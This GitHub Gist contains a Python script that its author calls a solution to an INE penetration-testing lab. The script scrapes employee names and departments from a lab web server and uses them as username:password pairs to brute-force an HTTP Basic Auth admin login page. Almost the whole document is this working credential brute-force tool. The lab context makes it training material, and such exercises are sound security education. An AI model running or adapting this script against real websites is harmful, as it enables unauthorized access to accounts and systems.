Created
February 15, 2021 23:02
-
-
Save JasonTurley/a8c2068ec83302b26ae90d183641761d to your computer and use it in GitHub Desktop.
My solution to the INE Penetration Testing Python Lab
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
This script collects names and department info from the target URL and | |
uses them to brute-force the "Admin Area" login page. | |
The lab can be found in INE's Penetration Testing Student course https://my.ine.com/ | |
""" | |
from bs4 import BeautifulSoup | |
import requests | |
def get_html(url): | |
response = requests.get(url) | |
html = response.text | |
return html | |
def parse_ids(html, id_name): | |
""" | |
Given HTML code, returns a list of values that have the id `id_name`. | |
""" | |
result = [] | |
soup = BeautifulSoup(html, "html.parser") | |
for item in soup.find_all(id=id_name): | |
result.append(item.contents[0]) | |
# Remove an duplicate entries | |
result = list(set(result)) | |
return result | |
def attack(): | |
# Scrape website for employee names and departments | |
html = get_html("http://172.16.120.120") | |
target = "http://172.16.120.120/admin.php" | |
names = parse_ids(html, "name") | |
departments = parse_ids(html, "department") | |
# Attempt to login to "Admin Area" with name:department credential pair | |
for name in names: | |
for department in departments: | |
response = requests.get(target, auth=(name, department)) | |
if response.status_code != 401: | |
print(f"Found successful login {name}:{department}") | |
return | |
if __name__ == "__main__": | |
attack() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment